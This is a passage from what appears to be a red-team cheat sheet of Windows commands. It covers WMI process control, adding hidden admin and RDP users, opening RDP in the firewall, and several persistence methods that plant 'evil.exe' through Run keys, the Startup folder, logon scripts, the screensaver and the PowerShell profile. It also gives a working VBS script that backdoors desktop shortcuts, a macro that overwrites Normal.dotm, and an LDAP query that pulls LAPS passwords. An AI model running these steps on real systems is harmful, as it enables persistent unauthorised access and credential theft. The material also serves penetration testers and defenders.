    Get-CimInstance -ClassName Win32_Process -Filter "Name = 'calculator.exe'" | Remove-CimInstance
    Get-CimInstance -Query "select * from Win32_Process where Name = 'calculator.exe'" | Remove-CimInstance

##### Get classes with methods

    Get-WmiObject * -List | Where-Object {$_.Methods}
    Get-CimClass -MethodName *
    Get-CimClass -MethodName *Create*

##### Explore class methods

    Get-WmiObject -Class Win32_Process -List | Select -ExpandProperty Methods
    (Get-WmiObject -Class Win32_Process -List).Methods

    Get-CimClass -ClassName Win32_Process | Select -ExpandProperty CimClassMethods
    (Get-CimClass -ClassName Win32_Process).CimClassMethods

##### Explore class method parameters

    Get-CimClass -ClassName Win32_Process | Select -ExpandProperty CimClassMethods | Where name -eq "Create" | Select -ExpandProperty Parameters

##### Use methods

    Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList calc.exe
    Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList @(calc.exe)

    Invoke-CimMethod -ClassName Win32_Process -Name Create -ARguments ${CommandLine = "calc.exe"}

##### Update WMI objects

    Get-WmiObject -Class Win32_Printer -Filter "Name = 'Microsoft XPS Document Writer'" | Set-WmiInstance -Arguments @{Comment = "<comment>"}
    Get-CimInstance -ClassName Win32_Printer -Filter "Name = 'Microsoft XPS Document Writer'" | Set-CimInstance -Property @{Comment = "<comment>"}
    Invoke-WmiMethos -Class Win32_Process -Name Create -ArgumentList @(calc.exe)

##### Get all process owner

    Get-WmiObject Win32_Process | Select-Object Name,@{n="Owner";e={$_.GetOwner().User}}

Persistence
===========
##### Add local user

    net user /add <username> <password>

##### Add local user to administrators group

    net localgroup Administrators <username> /add

##### Add local user to RDP group

    net localuser "Remote Desktop Users" <username> /add

##### Enable RDP and open firewall

    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

##### Disable RDP and close firewall

    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
    netsh advfirewall firewall set rule group="remote desktop" new enable=No

#### Persistence techniques
##### Startup folder

    copy C:\path\to\evil.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"

##### Registry run keys

    reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v MSUpdate /t REG_SZ /d "C:\path\to\evil.exe" /f

##### Logon script

    reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /d "C:\path\to\evil.exe" /t REG_SZ /f

##### Screensaver

    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "C:\path\to\evil.exe" /f
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "ScreenSaveTimeOut" /t REG_SZ /d "10" /f

##### Powershell profile

    dir %HOMEPATH%"\Documents\windowspowershell
    echo "C:\path\to\evil.exe" > %HOMEPATH%"\Documents\windowspowershell\profile.ps1

##### LNK backdooring with file to disk
VBS to backdoor a LNK on Desktop

    evil = "C:\path\to\evil.exe"
    placeholder = "C:\path\to\placeholder.vbs"
    shortcutName = "shortcut_name.lnk"

    set Wshell = WScript.CreateObject("WScript.Shell")
    strDesktop = Wshell.SpecialFolders("Desktop")
    set oShellLink = Wshell.CreateShortcut(strDesktop & "\" & shortcutName)
    originalTarget = oShellLink.TargetPath
    originalArgs = oShellLink.Arguments
    originalIcon = oShellLink.IconLocation
    originalDir = oShellLink.WorkingDirectory

    Set FSO = CreateObject("Scripting.FileSystemObject")
    Set FH = FSO.CreateTextFile(placeholder,True)
    FH.Write "Set oShell = WScript.CreateObject(" & chr(34) & "WScript.Shell" & chr(34) & ")" & vbCrLf
    FH.Write "oShell.Run " & chr(34) & evil & chr(34) & vbCrLf
    FH.Write "oShell.Run " & chr(34) & oShellLink.TargetPath & " " & oShellLink.Arguments & chr(34) & vbCrLf
    FH.Close

    oShellLink.TargetPath = placeholder
    oShellLink.IconLocation = originalTarget & ", 0"
    oShellLink.WorkingDirectory = originalDir
    oShellLink.WindowStyle = 7
    oShellLink.Save

##### Overwrite Normal.dotm with MS Office Macro

    Set objShell = CreateObject("WScript.Shell")
    appDataLoc = objShell.ExpandEnvironmentStrings("%APPDATA")
    Path = appDataLoc & "\Microsoft\Templates"
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objFile = objFSO.CreateTextFile(Path & "\Normal.dotm",  True)
    objFile.Write payload
    objFile.Close

Misc
====
#### Powershell mouse jiggler

    function MouseWiggle {
        Add-Type -Assembly System.Windows.Forms
        while($true) {
            Start-Sleep -Seconds 1
            [Windows.Forms.Cursor]::Position = New-Object Drawing.Point (random 1000),(random 1000)
        }
    }

#### LDAP search filter to enumerate LAPS passwords (permissions required)

    ([adsisearcher]'(&(objectCategory=computer)(ms-MCS-AdmPwd=*))').FindAll().Properties

#### Insecure ACEs

    GenericAll              - full control on object
    GenericWrite            - write attributes to an object (e.g. logon script)
    WriteOwner              - change owner of an object
    WriteDACL               - modify object ACEs
    AllExtendedRights       - add user to a group or reset password
    ForceChangePassword     - change user password
    Self (Self-Membership)  - add yourself to group

#### Windows file permissions
A sequence of simple rights

    F (full access)
    M (modify access)
    RX (read and execute access)
    R (read-only access)
    W (write-only access)

A comma-separated list in parenthesis of specific rights

    D (delete)
    RC (read control)
    WDAC (write DAC)
    WO (write owner)
    S (synchronize)
    AS (access system security)
    MA (maximum allowed)
    GR (generic read)
    GW (generic write)
    GE (generic execute)
    GA (generic all)
    RD (read data/list directory)
    WD (write data/add file)
    AD (append data/add subdirectory)
    REA (read extended attributes)
    WEA (write extended attributes)
    X (execute/traverse)
    DC (delete child)
    RA (read attributes)
    WA (write attributes)

Inheritance rights may precede either Perm form, and they are applied only to directories

    (OI): object inherit
    (CI): container inherit
    (IO): inherit only
    (NP): do not propagate inherit

